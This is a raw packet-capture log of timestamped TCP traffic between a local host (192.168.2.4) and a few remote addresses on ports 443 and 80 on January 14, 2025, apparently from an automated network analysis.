                                                                                                                                                      Jan 14, 2025 13:25:38.717602968 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.717622042 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.717653036 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.717660904 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.717680931 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.717705011 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.717952967 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.717974901 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.718014002 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.718020916 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.718034029 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.718175888 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.718218088 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.718235016 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.718241930 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.718261003 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.766366959 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.801287889 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.801321983 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.801382065 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.801393032 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.801434040 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.802205086 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.802229881 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.802267075 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.802274942 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.802294016 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.802313089 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803011894 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803041935 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803078890 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803086042 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803097963 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803498030 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803523064 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803561926 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803575993 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803590059 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803613901 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803826094 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803847075 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803885937 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803891897 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.803917885 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.803937912 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804194927 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804217100 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804255009 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804260969 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804286003 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804301023 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804532051 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804557085 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804595947 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804604053 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804629087 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804644108 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804847956 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804868937 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804907084 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.804914951 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.804928064 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.805000067 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.887993097 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.888036013 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.888083935 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.888093948 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.888125896 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.888147116 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.888664007 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.888689995 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.888722897 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.888734102 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.888756037 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.888777018 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.889235973 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.889266014 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.889301062 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.889307976 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.889339924 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.889354944 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.889950991 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.889972925 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890011072 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890018940 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890039921 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890060902 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890445948 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890466928 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890500069 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890513897 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890532970 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890561104 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890791893 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890815020 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890851021 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890857935 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.890903950 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.890903950 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.891127110 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.891149998 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.891186953 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.891194105 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.891217947 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.891228914 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.891381979 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.891419888 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.891442060 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.891448975 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.891468048 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.938446045 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.974951982 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.974994898 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.975035906 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.975045919 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.975084066 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.975534916 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.975558996 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.975593090 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.975600004 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.975625038 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.975644112 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.976200104 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.976233006 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.976264954 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.976273060 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.976300955 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.976319075 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.976876020 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.976897001 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.976932049 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.976938963 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.976967096 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.976986885 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.977289915 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.977313995 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.977345943 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.977358103 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.977384090 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.977394104 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.977597952 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.977619886 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.977654934 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.977660894 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.977695942 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.977710009 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.978038073 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.978059053 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.978101969 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.978107929 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.978120089 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.978147030 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.978149891 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:38.978249073 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.978329897 CET49933443192.168.2.4172.65.251.78
                                                                                                                                                      Jan 14, 2025 13:25:38.978346109 CET44349933172.65.251.78192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:39.885252953 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:39.885303020 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:39.885365009 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:39.885603905 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:39.885620117 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.339893103 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.340118885 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.341250896 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.341262102 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.341500998 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.342274904 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.383353949 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.466130972 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.466167927 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.466212988 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.466562033 CET49956443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.466571093 CET44349956104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.467736959 CET49962443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.467832088 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.467941999 CET49962443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.468110085 CET49962443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.468132019 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.944785118 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.978919983 CET49962443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.978986979 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:40.979382992 CET49962443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:40.979397058 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.113492012 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.113653898 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.113853931 CET49962443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:41.125039101 CET49962443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:41.125108957 CET44349962104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.195724010 CET4996480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:41.201014042 CET8049964208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.201112986 CET4996480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:41.208766937 CET4996480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:41.213686943 CET8049964208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.660679102 CET8049964208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.660911083 CET4996480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:41.666107893 CET8049964208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.666165113 CET4996480192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:41.683269978 CET49968443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:41.683403015 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:41.683512926 CET49968443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:41.683943987 CET49968443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:41.684058905 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.172313929 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.173096895 CET49968443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.173130035 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.173597097 CET49968443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.173603058 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.323447943 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.323611975 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.323719978 CET49968443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.324008942 CET49968443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.324050903 CET44349968104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.324934006 CET49972443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.324995041 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.325104952 CET49972443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.325288057 CET49972443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.325298071 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.793684006 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.796974897 CET49972443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.797008991 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.797462940 CET49972443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.797470093 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.924642086 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.924813986 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.924894094 CET49972443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.925065041 CET49972443192.168.2.4104.26.13.205
                                                                                                                                                      Jan 14, 2025 13:25:42.925091028 CET44349972104.26.13.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.927069902 CET4997680192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:42.933373928 CET8049976208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:42.933449984 CET4997680192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:42.933598042 CET4997680192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:42.938460112 CET8049976208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:43.392640114 CET8049976208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:43.392875910 CET4997680192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:25:43.397974014 CET8049976208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:25:43.400717974 CET4997680192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:34.402498007 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:34.402529955 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:34.402620077 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:34.412321091 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:34.412348986 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:34.878591061 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:34.878797054 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:34.879910946 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:34.879944086 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:34.880172014 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:34.916184902 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:34.963327885 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.032783985 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.032876015 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.032948017 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.033148050 CET50069443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.033190966 CET44350069104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.034050941 CET50070443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.034146070 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.034243107 CET50070443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.034400940 CET50070443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.034429073 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.509035110 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.510463953 CET50070443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.510529041 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.510869980 CET50070443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.510881901 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.646877050 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.646933079 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.647025108 CET50070443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.647264957 CET50070443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:35.647317886 CET44350070104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.655735016 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:35.661369085 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:35.661434889 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:35.661570072 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:35.666374922 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.125983953 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.126252890 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:36.129715919 CET50072443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.129734039 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.129815102 CET50072443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.130000114 CET50072443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.130003929 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.131362915 CET8050071208.95.112.1192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.131433964 CET5007180192.168.2.4208.95.112.1
                                                                                                                                                      Jan 14, 2025 13:26:36.592859030 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.593413115 CET50072443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.593436956 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.593843937 CET50072443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.593848944 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.742609024 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.742666960 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.742717981 CET50072443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.742960930 CET50072443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.742974043 CET44350072104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.743954897 CET50073443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.743993998 CET44350073104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:36.744066000 CET50073443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.744246006 CET50073443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:36.744259119 CET44350073104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.207978010 CET44350073104.26.12.205192.168.2.4
                                                                                                                                                      Jan 14, 2025 13:26:37.208515882 CET50073443192.168.2.4104.26.12.205
                                                                                                                                                      Jan 14, 2025 13:26:37.208581924 CET44350073104.26.12.205192.168.2.4
